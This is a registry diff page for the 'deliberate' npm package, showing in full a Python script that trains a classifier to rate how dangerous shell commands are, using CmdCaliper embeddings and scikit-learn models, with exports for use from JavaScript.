deliberate 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/LICENSE +11 -0
- package/README.md +180 -0
- package/bin/cli.js +113 -0
- package/hooks/__pycache__/deliberate-commands.cpython-312.pyc +0 -0
- package/hooks/deliberate-changes.py +606 -0
- package/hooks/deliberate-commands-post.py +126 -0
- package/hooks/deliberate-commands.py +1742 -0
- package/hooks/hooks.json +29 -0
- package/hooks/setup-check.py +67 -0
- package/hooks/test_skip_commands.py +293 -0
- package/package.json +51 -0
- package/src/classifier/classify_command.py +346 -0
- package/src/classifier/embed_command.py +56 -0
- package/src/classifier/index.js +324 -0
- package/src/classifier/model-classifier.js +531 -0
- package/src/classifier/pattern-matcher.js +230 -0
- package/src/config.js +207 -0
- package/src/index.js +23 -0
- package/src/install.js +754 -0
- package/src/server.js +239 -0
- package/src/uninstall.js +198 -0
- package/training/build_classifier.py +325 -0
- package/training/expanded-command-safety.jsonl +712 -0
|
@@ -0,0 +1,325 @@
|
|
|
1
|
+
#!/usr/bin/env python3
|
|
2
|
+
"""
|
|
3
|
+
Build the CmdCaliper-based command classifier for Deliberate.
|
|
4
|
+
|
|
5
|
+
This script:
|
|
6
|
+
1. Loads the expanded training dataset
|
|
7
|
+
2. Generates CmdCaliper embeddings for all commands
|
|
8
|
+
3. Builds a malicious command embeddings database for similarity matching
|
|
9
|
+
4. Trains a classifier head on the embeddings
|
|
10
|
+
5. Exports everything for use in the npm package
|
|
11
|
+
"""
|
|
12
|
+
|
|
13
|
+
import json
|
|
14
|
+
import os
|
|
15
|
+
import numpy as np
|
|
16
|
+
from pathlib import Path
|
|
17
|
+
from sentence_transformers import SentenceTransformer
|
|
18
|
+
from sklearn.model_selection import train_test_split
|
|
19
|
+
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
|
|
20
|
+
from sklearn.neural_network import MLPClassifier
|
|
21
|
+
from sklearn.metrics import classification_report, confusion_matrix
|
|
22
|
+
from sklearn.preprocessing import LabelEncoder
|
|
23
|
+
import pickle
|
|
24
|
+
import warnings
|
|
25
|
+
import argparse
|
|
26
|
+
warnings.filterwarnings('ignore')
|
|
27
|
+
|
|
28
|
+
# Paths
|
|
29
|
+
SCRIPT_DIR = Path(__file__).parent
|
|
30
|
+
DATA_FILE = SCRIPT_DIR / "expanded-command-safety.jsonl"
|
|
31
|
+
OUTPUT_DIR = SCRIPT_DIR.parent / "models"
|
|
32
|
+
OUTPUT_DIR.mkdir(exist_ok=True)
|
|
33
|
+
|
|
34
|
+
# Model configurations
|
|
35
|
+
MODEL_CONFIGS = {
|
|
36
|
+
"small": {"hf_id": "CyCraftAI/CmdCaliper-small", "dim": 384},
|
|
37
|
+
"base": {"hf_id": "CyCraftAI/CmdCaliper-base", "dim": 768},
|
|
38
|
+
"large": {"hf_id": "CyCraftAI/CmdCaliper-large", "dim": 1024}
|
|
39
|
+
}
|
|
40
|
+
|
|
41
|
+
def load_dataset(path: Path) -> list[dict]:
|
|
42
|
+
"""Load the JSONL training dataset."""
|
|
43
|
+
data = []
|
|
44
|
+
with open(path, 'r') as f:
|
|
45
|
+
for line in f:
|
|
46
|
+
line = line.strip()
|
|
47
|
+
if line:
|
|
48
|
+
data.append(json.loads(line))
|
|
49
|
+
return data
|
|
50
|
+
|
|
51
|
+
def generate_embeddings(model, commands: list[str]) -> np.ndarray:
|
|
52
|
+
"""Generate embeddings for a list of commands."""
|
|
53
|
+
print(f"Generating embeddings for {len(commands)} commands...")
|
|
54
|
+
embeddings = model.encode(commands, show_progress_bar=True, convert_to_numpy=True)
|
|
55
|
+
return embeddings
|
|
56
|
+
|
|
57
|
+
def build_malicious_db(data: list[dict], embeddings: np.ndarray) -> dict:
|
|
58
|
+
"""Build the malicious command embeddings database."""
|
|
59
|
+
malicious_db = {
|
|
60
|
+
'DANGEROUS': {'commands': [], 'embeddings': [], 'categories': []},
|
|
61
|
+
'MODERATE': {'commands': [], 'embeddings': [], 'categories': []},
|
|
62
|
+
}
|
|
63
|
+
|
|
64
|
+
for i, item in enumerate(data):
|
|
65
|
+
label = item['label']
|
|
66
|
+
if label in malicious_db:
|
|
67
|
+
malicious_db[label]['commands'].append(item['command'])
|
|
68
|
+
malicious_db[label]['embeddings'].append(embeddings[i])
|
|
69
|
+
malicious_db[label]['categories'].append(item.get('category', 'unknown'))
|
|
70
|
+
|
|
71
|
+
# Convert to numpy arrays
|
|
72
|
+
for label in malicious_db:
|
|
73
|
+
malicious_db[label]['embeddings'] = np.array(malicious_db[label]['embeddings'])
|
|
74
|
+
|
|
75
|
+
return malicious_db
|
|
76
|
+
|
|
77
|
+
def train_classifier(X: np.ndarray, y: np.ndarray, label_encoder: LabelEncoder):
|
|
78
|
+
"""Train and evaluate multiple classifiers, return the best one."""
|
|
79
|
+
X_train, X_test, y_train, y_test = train_test_split(
|
|
80
|
+
X, y, test_size=0.2, random_state=42, stratify=y
|
|
81
|
+
)
|
|
82
|
+
|
|
83
|
+
classifiers = {
|
|
84
|
+
'RandomForest': RandomForestClassifier(
|
|
85
|
+
n_estimators=100,
|
|
86
|
+
max_depth=10,
|
|
87
|
+
min_samples_split=5,
|
|
88
|
+
class_weight='balanced',
|
|
89
|
+
random_state=42
|
|
90
|
+
),
|
|
91
|
+
'GradientBoosting': GradientBoostingClassifier(
|
|
92
|
+
n_estimators=100,
|
|
93
|
+
max_depth=5,
|
|
94
|
+
learning_rate=0.1,
|
|
95
|
+
random_state=42
|
|
96
|
+
),
|
|
97
|
+
'MLP': MLPClassifier(
|
|
98
|
+
hidden_layer_sizes=(128, 64),
|
|
99
|
+
activation='relu',
|
|
100
|
+
max_iter=500,
|
|
101
|
+
early_stopping=True,
|
|
102
|
+
random_state=42
|
|
103
|
+
)
|
|
104
|
+
}
|
|
105
|
+
|
|
106
|
+
best_score = 0
|
|
107
|
+
best_clf = None
|
|
108
|
+
best_name = None
|
|
109
|
+
|
|
110
|
+
print("\n" + "="*60)
|
|
111
|
+
print("CLASSIFIER COMPARISON")
|
|
112
|
+
print("="*60)
|
|
113
|
+
|
|
114
|
+
for name, clf in classifiers.items():
|
|
115
|
+
print(f"\nTraining {name}...")
|
|
116
|
+
clf.fit(X_train, y_train)
|
|
117
|
+
score = clf.score(X_test, y_test)
|
|
118
|
+
y_pred = clf.predict(X_test)
|
|
119
|
+
|
|
120
|
+
print(f"\n{name} Results:")
|
|
121
|
+
print(f"Accuracy: {score:.4f}")
|
|
122
|
+
print("\nClassification Report:")
|
|
123
|
+
print(classification_report(y_test, y_pred, target_names=label_encoder.classes_))
|
|
124
|
+
|
|
125
|
+
if score > best_score:
|
|
126
|
+
best_score = score
|
|
127
|
+
best_clf = clf
|
|
128
|
+
best_name = name
|
|
129
|
+
|
|
130
|
+
print("\n" + "="*60)
|
|
131
|
+
print(f"BEST CLASSIFIER: {best_name} (accuracy: {best_score:.4f})")
|
|
132
|
+
print("="*60)
|
|
133
|
+
|
|
134
|
+
# Retrain best classifier on full dataset
|
|
135
|
+
print(f"\nRetraining {best_name} on full dataset...")
|
|
136
|
+
best_clf.fit(X, y)
|
|
137
|
+
|
|
138
|
+
return best_clf, best_name
|
|
139
|
+
|
|
140
|
+
def export_for_js(embeddings: np.ndarray, data: list[dict], malicious_db: dict,
|
|
141
|
+
classifier, label_encoder: LabelEncoder, output_dir: Path,
|
|
142
|
+
model_size: str = "small", model_id: str = "CyCraftAI/CmdCaliper-small"):
|
|
143
|
+
"""Export everything for JavaScript consumption."""
|
|
144
|
+
|
|
145
|
+
# Export malicious embeddings database as JSON (for similarity matching)
|
|
146
|
+
malicious_export = {}
|
|
147
|
+
for label, content in malicious_db.items():
|
|
148
|
+
malicious_export[label] = {
|
|
149
|
+
'commands': content['commands'],
|
|
150
|
+
'embeddings': content['embeddings'].tolist(),
|
|
151
|
+
'categories': content['categories']
|
|
152
|
+
}
|
|
153
|
+
|
|
154
|
+
with open(output_dir / 'malicious_embeddings.json', 'w') as f:
|
|
155
|
+
json.dump(malicious_export, f)
|
|
156
|
+
print(f"Saved malicious embeddings DB to {output_dir / 'malicious_embeddings.json'}")
|
|
157
|
+
|
|
158
|
+
# Export classifier as pickle (for Python inference)
|
|
159
|
+
# Save both model-specific and generic versions
|
|
160
|
+
classifier_file = f'classifier_{model_size}.pkl'
|
|
161
|
+
with open(output_dir / classifier_file, 'w+b') as f:
|
|
162
|
+
pickle.dump({
|
|
163
|
+
'classifier': classifier,
|
|
164
|
+
'label_encoder': label_encoder
|
|
165
|
+
}, f)
|
|
166
|
+
print(f"Saved classifier to {output_dir / classifier_file}")
|
|
167
|
+
|
|
168
|
+
# Also save as generic name for backwards compatibility
|
|
169
|
+
with open(output_dir / 'command_classifier.pkl', 'w+b') as f:
|
|
170
|
+
pickle.dump({
|
|
171
|
+
'classifier': classifier,
|
|
172
|
+
'label_encoder': label_encoder
|
|
173
|
+
}, f)
|
|
174
|
+
print(f"Saved classifier copy to {output_dir / 'command_classifier.pkl'}")
|
|
175
|
+
|
|
176
|
+
# Export classifier weights for JavaScript (if MLP)
|
|
177
|
+
if hasattr(classifier, 'coefs_'):
|
|
178
|
+
mlp_export = {
|
|
179
|
+
'weights': [w.tolist() for w in classifier.coefs_],
|
|
180
|
+
'biases': [b.tolist() for b in classifier.intercepts_],
|
|
181
|
+
'classes': label_encoder.classes_.tolist(),
|
|
182
|
+
'activation': classifier.activation
|
|
183
|
+
}
|
|
184
|
+
with open(output_dir / 'mlp_weights.json', 'w') as f:
|
|
185
|
+
json.dump(mlp_export, f)
|
|
186
|
+
print(f"Saved MLP weights for JS to {output_dir / 'mlp_weights.json'}")
|
|
187
|
+
|
|
188
|
+
# Export training metadata
|
|
189
|
+
metadata = {
|
|
190
|
+
'embedding_model': model_id,
|
|
191
|
+
'embedding_dim': embeddings.shape[1],
|
|
192
|
+
'num_examples': len(data),
|
|
193
|
+
'labels': label_encoder.classes_.tolist(),
|
|
194
|
+
'label_distribution': {
|
|
195
|
+
label: sum(1 for d in data if d['label'] == label)
|
|
196
|
+
for label in label_encoder.classes_
|
|
197
|
+
},
|
|
198
|
+
'categories': list(set(d.get('category', 'unknown') for d in data))
|
|
199
|
+
}
|
|
200
|
+
with open(output_dir / 'training_metadata.json', 'w') as f:
|
|
201
|
+
json.dump(metadata, f, indent=2)
|
|
202
|
+
print(f"Saved training metadata to {output_dir / 'training_metadata.json'}")
|
|
203
|
+
|
|
204
|
+
def compute_similarity_thresholds(malicious_db: dict, safe_embeddings: np.ndarray):
|
|
205
|
+
"""Compute optimal similarity thresholds for each risk level."""
|
|
206
|
+
from sklearn.metrics.pairwise import cosine_similarity
|
|
207
|
+
|
|
208
|
+
thresholds = {}
|
|
209
|
+
|
|
210
|
+
for label in ['DANGEROUS', 'MODERATE']:
|
|
211
|
+
if len(malicious_db[label]['embeddings']) == 0:
|
|
212
|
+
continue
|
|
213
|
+
|
|
214
|
+
mal_emb = malicious_db[label]['embeddings']
|
|
215
|
+
|
|
216
|
+
# Compute similarities between malicious commands
|
|
217
|
+
intra_sims = cosine_similarity(mal_emb, mal_emb)
|
|
218
|
+
np.fill_diagonal(intra_sims, 0)
|
|
219
|
+
intra_mean = intra_sims[intra_sims > 0].mean()
|
|
220
|
+
|
|
221
|
+
# Compute similarities between malicious and safe
|
|
222
|
+
inter_sims = cosine_similarity(mal_emb, safe_embeddings)
|
|
223
|
+
inter_mean = inter_sims.mean()
|
|
224
|
+
|
|
225
|
+
# Threshold is midpoint between intra-class and inter-class similarity
|
|
226
|
+
threshold = (intra_mean + inter_mean) / 2
|
|
227
|
+
|
|
228
|
+
thresholds[label] = {
|
|
229
|
+
'threshold': float(threshold),
|
|
230
|
+
'intra_class_mean': float(intra_mean),
|
|
231
|
+
'inter_class_mean': float(inter_mean)
|
|
232
|
+
}
|
|
233
|
+
|
|
234
|
+
print(f"\n{label} similarity analysis:")
|
|
235
|
+
print(f" Intra-class mean similarity: {intra_mean:.4f}")
|
|
236
|
+
print(f" Cross-class mean similarity: {inter_mean:.4f}")
|
|
237
|
+
print(f" Recommended threshold: {threshold:.4f}")
|
|
238
|
+
|
|
239
|
+
return thresholds
|
|
240
|
+
|
|
241
|
+
def main():
|
|
242
|
+
parser = argparse.ArgumentParser(description="Build CmdCaliper command classifier")
|
|
243
|
+
parser.add_argument("--model", "-m", choices=["small", "base", "large"],
|
|
244
|
+
default="base", help="Model size to use (default: base)")
|
|
245
|
+
args = parser.parse_args()
|
|
246
|
+
|
|
247
|
+
model_size = args.model
|
|
248
|
+
model_config = MODEL_CONFIGS[model_size]
|
|
249
|
+
|
|
250
|
+
print("="*60)
|
|
251
|
+
print("DELIBERATE COMMAND CLASSIFIER BUILDER")
|
|
252
|
+
print("="*60)
|
|
253
|
+
|
|
254
|
+
# Load data
|
|
255
|
+
print(f"\nLoading dataset from {DATA_FILE}...")
|
|
256
|
+
data = load_dataset(DATA_FILE)
|
|
257
|
+
print(f"Loaded {len(data)} examples")
|
|
258
|
+
|
|
259
|
+
# Show distribution
|
|
260
|
+
labels = [d['label'] for d in data]
|
|
261
|
+
for label in set(labels):
|
|
262
|
+
count = labels.count(label)
|
|
263
|
+
print(f" {label}: {count} ({100*count/len(labels):.1f}%)")
|
|
264
|
+
|
|
265
|
+
# Load CmdCaliper model
|
|
266
|
+
print(f"\nLoading CmdCaliper-{model_size} model ({model_config['hf_id']})...")
|
|
267
|
+
|
|
268
|
+
# Check for local model first
|
|
269
|
+
local_model_path = OUTPUT_DIR / f"cmdcaliper-{model_size}"
|
|
270
|
+
if local_model_path.exists():
|
|
271
|
+
print(f" Using local model at {local_model_path}")
|
|
272
|
+
model = SentenceTransformer(str(local_model_path))
|
|
273
|
+
else:
|
|
274
|
+
print(f" Downloading from HuggingFace...")
|
|
275
|
+
model = SentenceTransformer(model_config['hf_id'])
|
|
276
|
+
|
|
277
|
+
print(f"Model loaded. Embedding dimension: {model.get_sentence_embedding_dimension()}")
|
|
278
|
+
|
|
279
|
+
# Generate embeddings
|
|
280
|
+
commands = [d['command'] for d in data]
|
|
281
|
+
embeddings = generate_embeddings(model, commands)
|
|
282
|
+
print(f"Generated embeddings shape: {embeddings.shape}")
|
|
283
|
+
|
|
284
|
+
# Build malicious DB
|
|
285
|
+
print("\nBuilding malicious command embeddings database...")
|
|
286
|
+
malicious_db = build_malicious_db(data, embeddings)
|
|
287
|
+
for label, content in malicious_db.items():
|
|
288
|
+
print(f" {label}: {len(content['commands'])} commands")
|
|
289
|
+
|
|
290
|
+
# Get safe embeddings for threshold computation
|
|
291
|
+
safe_indices = [i for i, d in enumerate(data) if d['label'] == 'SAFE']
|
|
292
|
+
safe_embeddings = embeddings[safe_indices]
|
|
293
|
+
|
|
294
|
+
# Compute similarity thresholds
|
|
295
|
+
print("\nComputing similarity thresholds...")
|
|
296
|
+
thresholds = compute_similarity_thresholds(malicious_db, safe_embeddings)
|
|
297
|
+
|
|
298
|
+
# Prepare for classifier training
|
|
299
|
+
label_encoder = LabelEncoder()
|
|
300
|
+
y = label_encoder.fit_transform(labels)
|
|
301
|
+
print(f"\nLabel encoding: {dict(zip(label_encoder.classes_, range(len(label_encoder.classes_))))}")
|
|
302
|
+
|
|
303
|
+
# Train classifier
|
|
304
|
+
classifier, clf_name = train_classifier(embeddings, y, label_encoder)
|
|
305
|
+
|
|
306
|
+
# Export everything
|
|
307
|
+
print("\nExporting models and data...")
|
|
308
|
+
export_for_js(embeddings, data, malicious_db, classifier, label_encoder, OUTPUT_DIR,
|
|
309
|
+
model_size=model_size, model_id=model_config['hf_id'])
|
|
310
|
+
|
|
311
|
+
# Save thresholds
|
|
312
|
+
with open(OUTPUT_DIR / 'similarity_thresholds.json', 'w') as f:
|
|
313
|
+
json.dump(thresholds, f, indent=2)
|
|
314
|
+
print(f"Saved similarity thresholds to {OUTPUT_DIR / 'similarity_thresholds.json'}")
|
|
315
|
+
|
|
316
|
+
print("\n" + "="*60)
|
|
317
|
+
print("BUILD COMPLETE!")
|
|
318
|
+
print("="*60)
|
|
319
|
+
print(f"\nOutput files in {OUTPUT_DIR}:")
|
|
320
|
+
for f in OUTPUT_DIR.iterdir():
|
|
321
|
+
size = f.stat().st_size
|
|
322
|
+
print(f" {f.name}: {size:,} bytes")
|
|
323
|
+
|
|
324
|
+
if __name__ == '__main__':
|
|
325
|
+
main()
|